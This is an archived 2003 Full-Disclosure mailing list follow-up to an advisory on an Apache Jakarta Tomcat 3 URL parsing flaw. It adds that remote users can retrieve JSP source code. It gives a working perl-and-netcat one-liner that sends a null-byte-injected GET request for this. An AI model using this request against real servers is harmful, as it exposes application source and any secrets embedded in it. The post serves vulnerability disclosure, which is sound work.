Re: [Full-Disclosure] Apache Jakarta Tomcat 3 URL parsing vulnerability
From: Jouko Pynnonen (jouko@solutions.fi)
Date: 01/30/03
- Previous message: John.Airey@rnib.org.uk: "RE: [Full-Disclosure] Re: Full Disclosure != Exploit Release"
- In reply to: Jouko Pynnonen: "[Full-Disclosure] Apache Jakarta Tomcat 3 URL parsing vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Jouko Pynnonen <jouko@solutions.fi> To: <full-disclosure@lists.netsys.com> Date: Thu, 30 Jan 2003 14:50:27 +0200 (EET)
One more thing: the vulnerability also allows remote users to retrieve
source of JSP files in this way:
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080
-- Jouko Pynnonen Online Solutions Ltd Secure your Linux - jouko@solutions.fi http://www.solutions.fi http://www.secmod.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Next message: sockz loves you: "Re: [Full-Disclosure] The worm author finally revealed!"
- Previous message: John.Airey@rnib.org.uk: "RE: [Full-Disclosure] Re: Full Disclosure != Exploit Release"
- In reply to: Jouko Pynnonen: "[Full-Disclosure] Apache Jakarta Tomcat 3 URL parsing vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
